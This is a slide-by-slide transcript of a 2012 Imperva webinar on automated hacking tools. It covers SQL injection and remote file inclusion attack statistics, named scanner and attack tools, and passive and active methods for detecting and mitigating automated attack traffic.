COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 

Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground

  • 1. Automated Hacking Tools: The New Rock Stars in the Cyber Underground © 2012 Imperva, Inc. All rights reserved.
  • 2. Agenda  Context for HII Reports  Introducing Automated Hacking + Quantifying Automation + Hacking Automation Use Cases + Sample Tools  Analyzing Real World Data  Detection and Mitigation  Questions and Answers 2 © 2012 Imperva, Inc. All rights reserved.
  • 3. Presenter: Amichai Shulman – CTO Imperva  Speaker at Industry Events + RSA, Sybase Techwave, Info Security UK, Black Hat  Lecturer on Info Security + Technion - Israel Institute of Technology  Former Security Consultant to Banks and Financial Services Firms  Leads the Application Defense Center (ADC) + Discovered over 20 commercial application vulnerabilities – Credited by Oracle, MS-SQL, IBM and others Amichai Shulman one of InfoWorld’s “Top 25 CTOs” © 2012 Imperva, Inc. All rights reserved.
  • 4. HII Report Context  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice + A different approach from vulnerability research  Data set composition + ~50 real world applications + Anonymous Proxies  More than 18 months of data  Powerful analysis system + Combines analytic tools with drill down capabilities 4 © 2012 Imperva, Inc. All rights reserved.
  • 5. Introducing Automated Hacking 5 © 2012 Imperva, Inc. All rights reserved.
  • 6. Quantifying Automation 6 © 2012 Imperva, Inc. All rights reserved.
  • 7. Quantifying Automation RFI SQLi Manual 2% 12% Manual Automatic 88% Automatic 98% 7 © 2012 Imperva, Inc. All rights reserved.
  • 8. Hacking Automation Use Cases  Automation affects the magnitude of the threat posed by hacking Honeypot.org: The Social Dynamics of Hacking 8 © 2012 Imperva, Inc. All rights reserved.
  • 9. Hacking Automation Use Cases  Skilled Hackers + Create more powerful tools + Focus not only on finding vulnerabilities but also on robust automation of their exploit (an engineering challenge)  Professional Hackers (Semi-skilled) + Can increase their business faster and more effectively using automation + Puts more organizations at risk as potential targets  Unskilled Hackers + Increased potential of incidental damages 9 © 2012 Imperva, Inc. All rights reserved.
  • 10. Hacking Automation Use Cases  Botnets + A step further in the evolution of automated hacking + Rather than automating a task it is automation of the entire operation  Includes all steps of the operation + Target selection + Probing + Exploit 10 © 2012 Imperva, Inc. All rights reserved.
  • 11. Automated Hacking Tools  Search engine hacking + Discovery phase + Mostly botnet based today  General scanners + Probing of chosen targets  Focused on attack type  Focused on individual vulnerability + Exist as standalone tools and botnet modules 11 © 2012 Imperva, Inc. All rights reserved.
  • 12. Automated Hacking Tools  High-end  Havij + Slick GUI (point and + Focused on SQL click) Injection attacks + Evasion techniques + Used in attacks by + State of the art attack Lulzsec and vectors Anonymous 12 © 2012 Imperva, Inc. All rights reserved.
  • 13. Automated Hacking Tools 13 © 2012 Imperva, Inc. All rights reserved.
  • 14. Automated Hacking Tools  Professional  SQLmap + Command line + Focused on SQL + Ready for Injection instrumentation  FIMAP + Focused on Remote File Include 14 © 2012 Imperva, Inc. All rights reserved.
  • 15. Automated Hacking Tools 15 © 2012 Imperva, Inc. All rights reserved.
  • 16. Automated Hacking Tools  WhiteHat flipping  Nikto + Public domain, sides low end + Tools aimed at  Nessus vulnerability scanning + Public domain + Automation is essential for (some versions), continuous testing of very friendly GUI large and complex web  Acunetix applications + Powerful commercial tool, + Inherently easier to stolen licenses operate are shared among hackers 16 © 2012 Imperva, Inc. All rights reserved.
  • 17. Analyzing Real World Data 17 © 2012 Imperva, Inc. All rights reserved.
  • 18. Type of Automation  The type of automation is tightly related to the nature of the vulnerability to be exploited  SQL Injection + Tools that focus on an individual application at a time + High volume, high rate traffic generated against a single application  RFI + Tools that try to cover as many applications as possible + Low volume traffic when watching a single application  Search Engine Hacking + Need to bypass search engine restrictions + Highly distributed botnets © 2012 Imperva, Inc. All rights reserved.
  • 19. Type of Automation 19 © 2012 Imperva, Inc. All rights reserved.
  • 20. Type of Automation  RFI Attacks  Many sources attack more than one target © 2012 Imperva, Inc. All rights reserved.
  • 21. Persistence of Sources  A fair amount of attack sources are persistent over time + Persistent source = more than 3 days of activity + 30% of SQLi attacks + 60% of RFI attacks 10000 SQLi Attacks (Log scale) 1000 100 10 1 0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100 Activity Days 21 © 2012 Imperva, Inc. All rights reserved.
  • 22. Persistence of Sources  RFI Attacks  Many consistent attackers © 2012 Imperva, Inc. All rights reserved.
  • 23. Persistence of Attack Vectors  RFI Attacks  Collect URLs that host infection script  Some URLs are being used consistently over time © 2012 Imperva, Inc. All rights reserved.
  • 24. Persistence of Attack Vectors  Many shell URLs are used against more than one target © 2012 Imperva, Inc. All rights reserved.
  • 25. Country of Origin  Most attack sources are in the US  Most high rate automation sources are in China! SQLi SQLi Country Hosts % of Hosts Country Hosts % of Hosts USA 3994 80 China 98 30 China 355 7 USA 78 24 United Kingdom 75 2 Netherlands 9 3 Russian Federation 49 1 Morocco 8 2 Canada 40 1 Egypt 7 2 Republic of Korea 33 1 Luxemburg 7 2 Germany 31 1 Brazil 7 2 Brazil 29 1 France 7 2 India 28 1 Indonesia 6 2 France 24 1 Russian Federation 6 2 25 © 2012 Imperva, Inc. All rights reserved.
  • 26. Detection and Mitigation 26 © 2012 Imperva, Inc. All rights reserved.
  • 27. General  Motivation + Automated hacking accounts for a large portion of attack traffic + Being able to detect malicious automation dramatically reduces the stress on other mechanisms designed to detect specific attacks  Challenge + Hard to implement WITHIN applications as automation can be applied against each and every part of the application or the underlying application server © 2012 Imperva, Inc. All rights reserved.
  • 28. Detecting Automated Hacking - Passive  Passive Methods + Watch network traffic “as-is” + Non intrusive, do not affect user experience  Traffic Shape Indicators + We measure suspicious requests (rather than ALL requests) + Measured attributes – Rate – Rate change (ramp-up speed) – Volume + Difficult to measure in an inherently noisy source (NAT)  Request Shape Indicators + Missing headers + Mismatch between headers and location 28 © 2012 Imperva, Inc. All rights reserved.
  • 29. Detecting Automated Hacking - Passive 29 © 2012 Imperva, Inc. All rights reserved.
  • 30. Detecting Automated Hacking - Active  Introduce changes into the server response + Test client’s reaction to changes + May affect user experience – use with care + Verify type of user agent  Browsers support Javascript and an appropriate DOM + Client is expected to complete some computation + Application / GW can validate the computed value  Browsers comply with HTML tags (IMG, IFRAME) + Client is expected to access resource referenced by embedded tags + Failure to access the resources implies that client is an automated script 30 © 2012 Imperva, Inc. All rights reserved.
  • 31. Mitigation - Wisdom of the Crowds  Detected automation feeds into building fingerprints of tools and reputation data for sources  Leveraged when data is collected within a community  Recent regulatory changes endorse the concept of community  Drop requests matching fingerprints or coming from ill reputed sources 31 © 2012 Imperva, Inc. All rights reserved.
  • 32. Mitigation – Challenges and Metering  Introduce changes to the response that require a true browser user-agent before letting any further requests within a session + Application / GW keeps sending the test for any request not in a validated session + A session is validated only if user-agent responds properly  Introduce changes to the response that (based on the previous enforcement) introduce client side latency + Challenge the client to solve a mathematical riddle + Partial hash collisions are a good example 32 © 2012 Imperva, Inc. All rights reserved.
  • 33. Mitigation (cont.)  Introduce CAPTCHA or other test to tell apart a human operator from a script 33 © 2012 Imperva, Inc. All rights reserved.
  • 34. Summary  Automation is ruling the threat landscape + It accounts for the lion share of attack traffic  Automation is used in various forms + In depth scanning / attack of a single target + Wide breadth scanning / attack of multiple applications + Distributed scanning / attack of single / multiple applications 34 © 2012 Imperva, Inc. All rights reserved.
  • 35. Summary (cont.)  Detection and mitigation are essential for reducing noise and focusing resources on the most complex attacks  Detection and mitigation are most effectively deployed out side of the application  Detection and mitigation must include a combination of passive and active measures  Detection and mitigation are best utilized within a community that can generate reputation data 35 © 2012 Imperva, Inc. All rights reserved.
  • 36. Webinar Materials Join Our LinkedIn Group, Imperva Data Security Direct for… Answers to Post-Webinar Attendee Discussions Questions Webinar Webinar Slides Recording Link © 2012 Imperva, Inc. All rights reserved.